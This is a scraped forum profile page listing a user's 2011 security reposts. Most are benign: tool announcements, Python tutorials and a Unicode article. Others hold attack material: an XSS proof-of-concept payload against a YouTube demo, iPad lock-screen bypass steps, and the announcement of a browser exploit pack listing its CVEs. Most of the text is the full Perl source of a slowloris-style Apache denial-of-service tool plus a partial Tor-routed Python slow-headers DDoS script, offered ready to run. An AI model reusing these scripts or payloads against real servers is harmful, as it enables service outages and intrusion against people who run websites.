-
Posts
18732 -
Joined
-
Last visited
-
Days Won
710
Everything posted by Nytro
-
Secure Your Wordpress | Tool Explained Wpscan Description: Wordpress is one of the most popular CMS among its entire open source competitor. WordPress has very simple and open framework. It is the most desirable choice of any hacker to start learning hacking with it. Today we will look at tool called wpscan. This tool is vulnerability scanner for any WordPress installation. It will let you know following things 1. Version of the WordPress 2. Known list of information disclosure files (ex. Readme.html) 3. WordPress usernames 4. WordPress Plugin names 5. Bruteforce for password (Password list needs to be generated) Video: http://www.securitytube.net/video/2367
-
Vezi cum arata link-ul, are nevoie de mici modificari... Ex: Download Security_and_Hacking_Anti_Hacker_Tool_Kit_Second_Edition.chm for free on Filesonic.com
-
xSQLScanner 1.2 and Mono Version From: Rodrigo Matuck <rodrigomatuck () globo com> Date: Sun, 23 Oct 2011 21:47:25 -0200 Hi everyone I published at my blog a new tool called xSQLScanner. This program allow the user audit MS-SQL and My-SQL servers. Some features: 1 - 6 Vulnerability Audit options; 1.2 - Test for weak password fast; 1.3 - Test for wear/user passwords; 1.4 - Wordlist option; 1.5 5 - Userlist option; 2 - Portscanner 7 - Range IP Address audit and more. Now the good news, i made 2 versions. Windows & Linux. The linux version use the Mono Project, so i compiled mono version to run under Linux (BackTrack 5 - GNOME). Here the instructions to install under linux: 1 - get xsqlscan-mono.tgz - 4shared.com - online file sharing and storage - download 2 - tar -xzvf xsqlscan.tar.gz 3 - cd xsqlscan 4 - ./xsqlscanw 5 - The program will verify if you have Mono Core files. If already have, the application will launcher. 5.1 - Answer 'yes' to download the libs and mono core files 6 - Restart the application typing: ./xsqlscanw 7 - Enjoy. The link for Windows version: xsqlscanner-1.2.zip - 4shared.com - online file sharing and storage - download Remember: any bugs, suggestions please contact me. Regards Sursa: Penetration Testing: xSQLScanner 1.2 and Mono Version
-
Owned and exposed - Nr. 3 |\___/| -=[ISSUE - NO 3]=- =) ^Y^ (= -=[OF]=- \ ^ / )=*=( ______________________________ __ ____________ _ / \ |.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | || _ | | | | | -__| _ | | . | | . || /| | | |\ ||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ | | | ______ |__//_// ___/ __ | | | .-----.--.--.-----.| |.-----.--\_).--| || | | | | -__|_ _| _ || || ||__ --| -__| _ || | | | |_____|__.__| __|| || ||_____|_____|_____|| |_/ \__________________________|__|___| || |___________________| |______| Featuring... .---. /\ Brought to you by .---. / . \ / \ your Happy Ninjas / . \ |\_/| | | | |\_/| | | | /| | b | | | /| .-----------------------' | | a | .---------------------------' | / .-. | | c | / .-. | | / \ Intro | | k | | / \ The Happy Ninja Faker | | |\_. | St0re.cc | | | | |\_. | Swissfaking.net | |\| | /| El-Basar.biz | | | |\| | /| Vpn24.org | | `---' | | | o | | `---' | | | |------------------' | n | | |----------------------' \ | .---. | c | \ | .---. \ / / . \ | e | \ / / . \ `---' |\_/| | | | `---' |\_/| | | | /| | | | | /| .-----------------------' | | a | .---------------------------' | / .-. | | g | / .-. | | / \ Undercover.su | | a | | / \ Secure-Host.in | | |\_. | k!LLu's Botnet | | i | | |\_. | Unique-Crew.net | |\| | /| | | n | |\| | /| | | `---' | | | | | `---' | | | |------------------' | | | |----------------------' \ | .---. | h | \ | .---. \ / / . \ | e | \ / / . \ `---' |\_/| | | r | `---' |\_/| | | | /| | e | | | /| .-----------------------' | | | .---------------------------' | / .-. | | | / .-. | | / \ Zion-Network.net | | t | | / \ Some leftovers | | |\_. | Hackbase.cc | | o | | |\_. | Outro | |\| | /| | | | |\| | /| | | `---' | | | | | `---' | | | |------------------' | r | | |----------------------' \ | | m | \ | \ / | | \ / `---' | /\ | `---' :\______|/ \|______/: \__0day______0day__/ | /\ | || || || || || || || || | \/ | \____/ (____) First of all, here is the verification of the sha1 hash we published when hba-crew got owned: 49bd4433fff1b04530dcaff1f52fa971ff895871 = sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03) ,;~;, /\_ ( / (() //) | \\ ,,;;'\ __ _( )m=((((((((((((((========={ Intro }=========------- /' ' '()/~' '.(, | ,;( )|| | ~ Tonight's the night. And it's going to happen, ,;' \ /-(.;, ) again and again. It has to happen. ) / ) / // || We all want to welcome you to a brand new issue )_\ )_\ of Owned and exp0sed! Before we get to the fun part, we'd just like to clarify some things since there has been a lot going on on the internet since our last issue. Movements, as they put it, like Anonymous or the short-lived phenomenon of Lulzsec have gotten an increasingly important topic to media and the public. We want to line out our motivation in contrast to theirs. Anonymous has tried to gain as much media attention as possible by inflicting the most damage possible on big companies and service providers. Similarily, Lulzsec have attacked various websites and published an enormous amount of information. However, while it's their goal to put up pressure on governments and big organizations, it's ours to protect the public from the abysses of the internet. Fraud is our main concern and we intent to contain it as much as possible. While Anon and Lulzsec toss out their stuff within weeks, we take our time to gain access, collect data and aggregate it nicely for you, our readers. This is why there is a substantial time span between our releases. We of course also monitor the German and international fraud scene as it recovers from our attacks; it's hard to stop something that is driven by selfishness, greed and money. We also find it worrying that Anonymous and especially Lulzsec act in what they call "Operation Antisec". The original Antisec Movement was brought to life by actual hackers and targeted full disclosure and the corporate security industry. Publishing gigantic amounts of (corporate) data on the internet does exactly the opposite: It provides the security industry with the attention they need and hence new customers. But let's now look at why we are here today. "Money is the root of all evil" as the proverb has it; and it's why fraud communities do come back after we have owned and exposed them; but as long as they carry on, we do, too. Fraudsters ought to know that they're not safe because we are going to hunt down every single site that is left. We experience the fraud scene scattering wider and wider after every issue we have published; new boards, and with them new admins, emerge out of nowhere. That just shows well again how stubborn fraudsters are as most of them still refuse to accept that they lost their right to exist on the internet. It's particularly frustrating that they don't seem to draw lessons from getting owned again and again. That being said we can just strongly advise you to spend your time on something worthwhile. It's not too late ... Download: http://blog.yakuza112.org/wp-content/uploads/2011/10/exp03.txt
-
Agnitio Security Code Review Tool v2.1 released OCTOBER 24, 2011 | WRITTEN BY SECURITY NINJA Hi everyone, I wanted to write a blog post today to let you all know that I've released Agnitio v2.1 today. I did plan to release this version a few weeks ago but a combination of life and bugs/last minute feature changes delayed the release, better late than never though! I’ve made a lot of changes for this release so I wanted to make extra sure that everything worked before I released it. Interestingly Agnitio passed all of its QA tests in the first test run but the Data Migration Tool was a different story! The DMT is used to migrate users existing data into the new Agnitio checklist database. It’s probably not the best way to perform an upgrade and it certainly needs some work but for now it works! Agnitio currently puts the new checklist database into the program files directory alongside the other Agnitio files which can cause a bit of problem because of the default file permissions on the Program Files directory. The program files directory in Windows 7 has better (the definition of better requires me look at it as a security professional and not as someone writing code!) default permissions/restrictions than previous versions of Windows I believe which causes a problem when using Agnitio or the DMT as a standard user. The user obviously needs to be able to read data from the checklist database and of course write reviews or changes to the database. I tried a few different approaches to rectifying this and I’ve settled on a solution which probably isn’t ideal but it does mean standard users can use Agnitio on Windows 7. The DMT will need to be run as an administrator to migrate the data but after that administrator privileges aren’t needed anymore. You will need to make a few permission changes regardless of the operating system you are using so please make sure you read the Agnitio v2.1 User Guide (included as part of the installation) before you attempt to use the new version or migrate your data. I’m currently working on a better solution to this with a new contributor so I’d expect to have a nicer solution to this problem when the next version of Agnitio is released! So what’s new in v2.1? I have listed all of the changes in this release below: Windows x64 support (thanks to Steven van der Baan). Decompile Android .apk files so you can analyse the source code and AndroidManifest.xml file. This uses tools like JAD so you will need to have Java installed on your machine to decompile the Android .apk files. C# and Java rules from the OWASP Code Crawler tool imported into the Agnitio database and linked to the relevant checklist questions. New checklist items for mobile application security code reviews. These checklist items were created to address items in the OWASP top 10 mobile risks project that weren’t covered by existing checklist items. Application profiles can now be configured as either “Web” or “Mobile”. This will determine which checklist items from the database are used to create the checklist for the application being reviewed. Create new checklist items. You will be able configure the relevant principle of secure development for the new checklist item as well as deciding whether this is a question for “Web”, “Mobile” or “Both” types of applications. Modify existing checklist items. This was supposed to be included in v2.0 but a last minute change I made at 7am in a Las Vegas hotel room broke this functionality. You can now modify the text, the principle and type columns for questions in the checklist database. I made a lot of small changes in addition to the ones above; I’ve listed some of the more obvious ones below: Only one answer allowed per checklist item (thanks to Steven van der Baan). Fixed a bug on the security code review tab where checklist items with no answers are highlighted in red and never “un-highlighted” (thanks to Steven van der Baan). Added a language checkbox for Objective-C on the profile creation and view profile tabs. Checklists are now sorted by principle and not by the question number. I did have two issues which I couldn’t get fixed but I decided to release v2.1 now because it has already taken longer than I’d planned! The two issues will only affect x64 users and I will make sure they are fixed as part of v2.2: Android .apk decompile functionality will fail to decompile .apk files on Windows x64. Data Migration Tool (for upgrades from v2.0) is not supported on x64 at the moment. You can use the Data Migration Tool on x86 versions of Windows to migrate your v2.0 data. I think I’ve included all of the new features and changes in this blog post so all that’s left for me to do now is give you link to download v2.1: Agnitio v2.1 I have started to plan what will be included in v2.2 but I’ve not started working on it yet. I have a few cool ideas in mind for v2.2 which I think you will all like. I’ve released 5 versions of Agnitio over the past 11 months which has eaten up a lot of my spare time and I don’t really enjoy working on one thing for a long time. I will be taking a couple of weeks away from the project before I start work on v2.2 to rest my poor overworked brain I don’t expect to release v2.2 until sometime after Christmas partly because of the break I’m taking from the project but mainly because of the amount of work that I will need to do to implement the cool changes I want to make! As always I’d love to hear what you think of the latest version of Agnitio so get in touch via Twitter, email or leave a comment on this blog post. SN Download: https://sourceforge.net/projects/agnitiotool/files/v2.1/ Sursa: https://www.securityninja.co.uk/application-security/agnitio-security-code-review-tool-v2-1-released/
-
Aidsql: Sql Injection Penetration Testing Tool Description: This is a video showing you how to effecitvely audit your website with aidsql. Download aidSQL: aidSQL: A Tools to Find Vulnerable Spots in Website - Insecure Stuff Video: http://www.securitytube.net/video/2370
-
https://www.google.com/search?hl=en&q=yo%2C+what%27s+my+ip%3F%21
-
Python Programming Tutorials Here is all of my Python Programming high quality tutorials! 3:19 Python Programming Tutorial - 1 - Installing Python by thenewboston 293,520 views 2 5:40 Python Programming Tutorial - 2 - Numbers and Math by thenewboston 192,181 views 3 6:25 Python Programming Tutorial - 3 - Variables by thenewboston 152,139 views 4 7:08 Python Programming Tutorial - 4 - Modules and Functions by thenewboston 154,537 views 5 8:25 Python Programming Tutorial - 5 - How to Save Your P... by thenewboston 122,680 views 6 6:23 Python Programming Tutorial - 6 - Strings by thenewboston 104,006 views 7 5:28 Python Programming Tutorial - 7 - More on Strings by thenewboston 86,868 views 8 2:56 Python Programming Tutorial - 8 - Raw Input by thenewboston 89,108 views 9 5:04 Python Programming Tutorial - 9 - Sequences and Lists by thenewboston 82,545 views 10 7:43 Python Programming Tutorial - 10 - Slicing by thenewboston 82,488 views 11 6:43 Python Programming Tutorial - 11 - Editing Sequences by thenewboston 72,190 views 12 6:28 Python Programming Tutorial - 12 - More List Functions by thenewboston 68,699 views 13 4:58 Python Programming Tutorial - 13 - Slicing Lists by thenewboston 55,699 views 14 6:02 Python Programming Tutorial - 14 - Intro to Methods by thenewboston 60,803 views 15 4:15 Python Programming Tutorial - 15 - More Methods by thenewboston 54,476 views 16 3:57 Python Programming Tutorial - 16 - Sort and Tuples by thenewboston 49,275 views 17 6:18 Python Programming Tutorial - 17 - Strings n Stuff by thenewboston 47,952 views 18 5:31 Python Programming Tutorial - 18 - Cool String Methods by thenewboston 50,276 views 19 6:13 Python Programming Tutorial - 19 - Dictionary by thenewboston 54,215 views 20 5:50 Python Programming Tutorial - 20 - If Statement by thenewboston 57,107 views 21 5:05 Python Programming Tutorial - 21 - else and elif by thenewboston 45,434 views 22 4:17 Python Programming Tutorial - 22 - Nesting Statements by thenewboston 41,405 views 23 4:33 Python Programming Tutorial - 23 - Comparison Operators by thenewboston 38,245 views 24 6:15 Python Programming Tutorial - 24 - And and Or by thenewboston 36,982 views 25 5:37 Python Programming Tutorial - 25 - For and While Loops by thenewboston 51,979 views 26 5:45 Python Programming Tutorial - 26 - Infinite Loops an... by thenewboston 42,562 views 27 5:20 Python Programming Tutorial - 27 - Building Functions by thenewboston 47,205 views 28 4:04 Python Programming Tutorial - 28 - Default Parameters by thenewboston 35,939 views 29 5:08 Python Programming Tutorial - 29 - Multiple Parameters by thenewboston 34,582 views 30 6:10 Python Programming Tutorial - 30 - Parameter Types by thenewboston 34,451 views 31 4:22 Python Programming Tutorial - 31 - Tuples as Parameters by thenewboston 29,344 views 32 7:10 Python Programming Tutorial - 32 - Object Oriented P... by thenewboston 63,602 views 33 7:48 Python Programming Tutorial - 33 - Classes and Self by thenewboston 54,274 views 34 4:12 Python Programming Tutorial - 34 - Subclasses Superc... by thenewboston 36,963 views 35 3:16 Python Programming Tutorial - 35 - Overwrite Variabl... by thenewboston 29,873 views 36 3:46 Python Programming Tutorial - 36 - Multiple Parent C... by thenewboston 28,343 views 37 4:17 Python Programming Tutorial - 37 - Constructors by thenewboston 30,597 views 38 6:51 Python Programming Tutorial - 38 - Import Modules by thenewboston 36,160 views 39 4:21 Python Programming Tutorial - 39 - reload Modules by thenewboston 25,267 views 40 5:21 Python Programming Tutorial - 40 - Getting Module Info by thenewboston 28,038 views 41 6:28 Python Programming Tutorial - 41 - Working with Files by thenewboston 38,421 views 42 5:23 Python Programming Tutorial - 42 - Reading and Writing by thenewboston 35,579 views 43 6:11 Python Programming Tutorial - 43 - Writing Lines by thenewboston 50,767 views Youtube: http://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
-
All About Python and Unicode March 4, 2007 - 3:39pm - frank Contents A Starting Point Unicode Text in Python Converting Unicode symbols to Python literals Why doesn't "print" work? Codecs From Unicode to binary From binary to Unicode String Operations A wrinkle in {{{\U}}} Bugs in Python 2.0 & 2.1 Python as a "universal recoder" Now the Fun Begins ... Unicode and the Real World Unicode Filenames Microsoft Windows Unix/POSIX/Linux Mac OS/X Unicode and HTML Unicode and XML Unicode and network shares (Samba) Summary Articol: http://boodebr.org/main/python/all-about-python-and-unicode
-
iPad 2 iOS 5 Lock Screen Bypass Vulnerability + Video Marc Gurman at 9to5Mac has discovered a vulnerability on the iPad that allows for a limited bypass of the device's lockscreen. Anyone with an iPad Smart Cover can gain access to the previously-open app (or the home screen if no app was open). By holding the power button to bring up the ‘Power Off’ screen, closing the smart cover, re-opening it, and clicking cancel, the attacker will be dropped into the screen that was open before the iPad was locked. If the attacker gets dropped into the home screen, then they'll be able to see the installed apps, but won't be able to open anything. If Safari or Mail (or any other app) was the open when the device was locked, then the attacker would have access to that app. From a locked iPad 2: 1) Lock a password protected iPad 2 2) Hold down power button until iPad 2 reaches turn off slider 3) Close Smart Cover 4) Open Smart Cover 5) Click cancel on the bottom of the screen Video: http://www.youtube.com/watch?v=NLgQ22naQhE This isn’t the first security issue Apple has experienced since rolling out iOS 5. On the brand new iPhone 4S it has been discovered you can use Siri when a device is locked. Even if a passcode is required, Siri doesn’t care and allows you to carry out functions such as sending email and text messages. Protection Against the iPad 2 Lock Screen Bypass: For the time being, iPad 2 users are encouraged to disable the "Smart Cover unlocking" feature found in Settings > General. Sursa: http://thehackernews.com/2011/10/ipad-2-ios-5-lock-screen-bypass.html
-
Anonymous Hackers Take Down 40 Child Porn Websites Anonymous has taken down more than 40 darknet-based child porn websites over the last week. Details of some of the hacks have been released via pastebin #OpDarknet, including personal details 1500 users of a site named 'Lolita City,' and DDoS tools that target Hidden Wiki and Freedom Hosting - alleged to be two of the biggest darknet sites hosting child porn. News of the Anonymous campaign to actively target anyone hosting child porn sites comes from statements associated with Anonymous on Pastebin and two Anonymous YouTube video channels. AnonNews has yet to issue a press release. The AnonMessage and BecomeAnonymous YouTube channels both posted videos with statements of intent to hunt, skin and kill pedobears everywhere, starting with Freedom Hosting. Sursa: http://thehackernews.com/2011/10/anonymous-hackers-take-down-40-child.html
-
OpenVAS - Advanced Open Source vulnerability scanner OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.The powerful and comprehensive OpenVAS solution is available as Free Software and maintained on a daily basis. An overview of the vulnerability handling process is: - The reporter reports the vulnerability privately to OpenVAS. - The appropriate component's developers works privately with the reporter to resolve the vulnerability. - A new release of the OpenVAS component concerned is made that includes the fix. The OpenVAS Manager is the central service that consolidates plain vulnerability scanning into a full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS Transfer Protocol) and itself offers the XML-based, stateless OpenVAS Management Protocol (OMP). All intelligence is implemented in the Manager so that it is possible to implement various lean clients that will behave consistently e.g. with regard to filtering or sorting scan results. The Manager also controls a SQL database (sqlite-based) where all configuration and scan result data is centrally stored. Download: http://www.openvas.org/download.html Sursa: OpenVAS - Advanced Open Source vulnerability scanner ~ THN : The Hacker News
-
XSS Vulnerability in Interactive YouTube API Demo Beta There is a Critical Cross site XSS Vulnerability in Interactive YouTube API Demo Beta, Discovered by various sources. One of the White Hat Hacker "Vansh Sharma" Inform us about this XSS Vulnerability with proof of concept. Proof Of Concept : Open YouTube Data API - Demo Beta Enter script <img src="<img src=search"/onerror=alert("xss")//"> in the keyword area. Press ADD Sursa: XSS Vulnerability in Interactive YouTube API Demo Beta ~ THN : The Hacker News
-
Bleeding Life 2 Exploit Pack Released Black Hat Academy releases Bleeding Life 2 exploit pack. This is an exploit pack that affects Windows-based web browsers via Adobe and Java. You can read all about it, and download it for yourself. Statistics are kept based on exploit, browser, and OS version. Exploits [+] Adobe - CVE-2008-2992 - CVE-2010-1297 - CVE-2010-2884 - CVE-2010-0188 [+] Java - CVE-2010-0842 - CVE-2010-3552 - Signed Applet Features Advanced Statistical Information Stylish Progress Bars Full User-Friendly Admin Panel Referer Stats Secure Panel - Login/Logout Ability To Set and Save Passwords On Panel Ability To Allow Guest Access - Guest Can Only View Stats Page, Clicking and Other Pages Disabled. Ability To Add and/or Remove Exploits Used Ability To Add Scan4You Credentials For Built-In Scanner Use Ability To Filter Browsers Ability To Filter Operating Systems Attempt To Detect and Filter HTTP Proxies Ability To Blacklist by IP/Range Ability To Import Blacklist On Panel Built In Scanner Ability To Upload Payload From Panel Payload Statistical Information - MD5, Size, SHA1 Ability To Generate iFrame On Panel / Encrypted Ability To Domain Check/Scan On Panel Download: http://www.blackhatacademy.org/releases/bleeding-life-2-download.tgz Sursa: http://thehackernews.com/2011/10/bleeding-life-2-exploit-pack-released.html
-
Apache Server Denial of Service exploit (DDOS) #!/usr/bin/perl -w # Exploit Title: Apache Server Denial of Service exploit (DDOS) # Date: 22/10/2011 # Author: Xen0n # Software Link: http://www.apache.org/dyn/closer.cgi # Version: 2.3.14 and older # Tested on: CentOs #feel free to contact us xenon.sec@gmail.com use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors print <<EOTEXT; ooooooo ooooo .oooo. `8888 d8' d8P'`Y8b Y888..8P .ooooo. ooo. .oo. 888 888 ooo. .oo. `8888' d88' `88b `888P"Y88b 888 888 `888P"Y88b .8PY888. 888ooo888 888 888 888 888 888 888 d8' `888b 888 .o 888 888 `88b d88' 888 888 o888o o88888o `Y8bod8P' o888o o888o `Y8bd8P' o888o o888o Welcome to Xen0n Apache Attacker EOTEXT my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections ); my ( $cache, $xenon, $method, $ssl, $rand, $tcpto ); my $result = GetOptions('shost=s' => \$shost,'dns=s' => \$host,'xenon' => \$xenon,'num=i' => \$connections,'cache' => \$cache,'port=i' => \$port,'https' => \$ssl,'tcpto=i' => \$tcpto,'test' => \$test,'timeout=i' => \$timeout,'version' => \$version,); if ($version) { print "Version 1.0\n"; exit; } unless ($host) { print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n"; print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n"; print "\n\temail: xenon.sec@ gmail.com\n"; print "\n"; exit; } unless ($port) { $port = 80; print "Defaulting to port 80.\n"; } unless ($tcpto) { $tcpto = 5; print "Defaulting to a 5 second tcp connection timeout.\n"; } unless ($test) { unless ($timeout) { $timeout = 100; print "Defaulting to a 100 second re-try timeout.\n"; } unless ($connections) { $connections = 1000; print "Defaulting to 1000 connections.\n"; } } my $usemultithreading = 0; if ( $Config{usethreads} ) { print "Multithreading enabled.\n"; $usemultithreading = 1; use threads; use threads::shared; } else { print "No multithreading capabilites found!\n"; print "Xen0n will be slower than normal as a result.\n"; } my $packetcount : shared = 0; my $failed : shared = 0; my $connectioncount : shared = 0; srand() if ($cache); if ($shost) { $sendhost = $shost; } else { $sendhost = $host; } if ($xenon) { $method = "POST"; } else { $method = "GET"; } if ($test) { my @times = ( "1", "30", "90", "240", "500" ); my $totaltime = 0; foreach (@times) { $totaltime = $totaltime + $_; } $totaltime = $totaltime / 60; print "Testing $host could take up to $totaltime minutes.\n"; my $delay = 0; my $working = 0; my $sock; if ($ssl) { if ( $sock = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } else { if ( $sock = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } if ($working) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "GET /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; if ( print $sock $primarypayload ) { print "Connection successful, now just wait...\n"; } else { print "That's odd - I connected but couldn't send the data to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } } else { print "Uhm... I can't connect to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } for ( my $i = 0 ; $i <= $#times ; $i++ ) { print "Trying a $times[$i] second delay: \n"; sleep( $times[$i] ); if ( print $sock "X-a: b\r\n" ) { print "\tWorked.\n"; $delay = $times[$i]; } else { if ( $SIG{__WARN__} ) { $delay = $times[ $i - 1 ]; last; } print "\tFailed after $times[$i] seconds.\n"; } } if ( print $sock "Connection: Close\r\n\r\n" ) { print "Okay that's enough time. Xen0n closed the socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } else { print "Remote server closed socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } if ( $delay < 166 ) { print <<EOSUCKS2BU; Since the timeout ended up being so small ($delay seconds) and it generally takes between 200-500 threads for most servers and assuming any latency at all... you might have trouble using Xen0n against this target. You can tweak the -tcpto flag down to 1 second but it still may not build the sockets in time. EOSUCKS2BU } } else { print "Attacking $host:$port every $timeout seconds with $connections sockets:\n"; if ($usemultithreading) { domultithreading($connections); } else { doconnections( $connections, $usemultithreading ); } } sub doconnections { my ( $num, $usemultithreading ) = @_; my ( @first, @sock, @working ); my $failedconnections = 0; $working[$_] = 0 foreach ( 1 .. $num ); #initializing $first[$_] = 0 foreach ( 1 .. $num ); #initializing while (1) { $failedconnections = 0; print "\t\tBuilding sockets.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 0 ) { if ($ssl) { if ( $sock[$z] = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; } else { $working[$z] = 0; } } else { if ( $sock[$z] = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK } else { $working[$z] = 0; } } if ( $working[$z] == 1 ) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "$method /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; my $handle = $sock[$z]; if ($handle) { print $handle "$primarypayload"; if ( $SIG{__WARN__} ) { $working[$z] = 0; close $handle; $failed++; $failedconnections++; } else { $packetcount++; $working[$z] = 1; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } } print "\t\tSending data.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 1 ) { if ( $sock[$z] ) { my $handle = $sock[$z]; if ( print $handle "X-a: b\r\n" ) { $working[$z] = 1; $packetcount++; } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } } print "Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n"; sleep($timeout); } } sub domultithreading { my ($num) = @_; my @thrs; my $i = 0; my $connectionsperthread = 50; while ( $i < $num ) { $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 ); $i += $connectionsperthread; } my @threadslist = threads->list(); while ( $#threadslist > 0 ) { $failed = 0; } } __END__ Sursa: Apache HTTP server Denial of service venerability
-
Pedo Gun - PEW PEW - Anonymous DDOSer #!/usr/bin/python # this assumes you have the socks.py (http://phiral.net/socks.py) # and terminal.py (http://phiral.net/terminal.py). DDoS used to take out Hidden Wiki and # Freedom Hosting sites. Based of Tor Hammer by entropy. Uses SLLLLLLOOOOW HEADERS # Chris H. [redacted to avoid copyright issues] attack import os import re import time import sys import random import math import getopt import socks import string import terminal from threading import Thread global stop_now global term stop_now = False term = terminal.TerminalController() useragents = [ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)", "Opera/9.20 (Windows NT 6.0; U; en)", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)", "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0", "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13", "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)", "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7" ] class httpPost(Thread): def __init__(self, host, port, tor): Thread.__init__(self) self.host = host self.port = port self.socks = socks.socksocket() self.tor = tor self.running = True def _send_http_post(self, pause=10): global stop_now self.socks.send("GET / HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: %s\r\n" "Connection: keep-alive\r\n" "Keep-Alive: 900\r\n" "Range: bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-" "Accept-Encoding: gzip, deflate, compress" % (self.host, random.choice(useragents))) for i in range(0, 9999): if stop_now: self.running = False break p = "X-"+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+": "+random.choice(string.letters+string.digits) print term.BOL+term.UP+term.CLEAR_EOL+"HEADER: %s" % p+term.NORMAL self.socks.send(p+"\r\n") time.sleep(random.uniform(30, 40)) self.socks.close() def run(self): while self.running: while self.running: try: if self.tor: self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050) self.socks.connect((self.host, self.port)) print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL break except Exception, e: if e.args[0] == 106 or e.args[0] == 60: break print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL time.sleep(1) continue while self.running: try: self._send_http_post() except Exception, e: if e.args[0] == 32 or e.args[0] == 104: print term.BOL+term.UP+term.CLEAR_EOL+"Thread broken, restarting..."+ term.NORMAL self.socks = socks.socksocket() break time.sleep(0.1) pass def usage(): print "./ch.py -t <target> [-r <threads> -p <port> -T -h]" print " -t|--target <Hostname|IP>" print " -r|--threads <Number of threads> Defaults to 256" print " -p|--port <Web Server Port> Defaults to 80" print " -h|--help Shows this help\n" print "Eg. ./ch.py -t 192.168.1.100 -r 256\n" def main(argv): try: opts, args = getopt.getopt(argv, "hTt:r:p:", ["help", "tor", "target=", "threads=", "port="]) except getopt.GetoptError: usage() sys.exit(-1) global stop_now target = '' threads = 256 tor = False port = 80 for o, a in opts: if o in ("-h", "--help"): 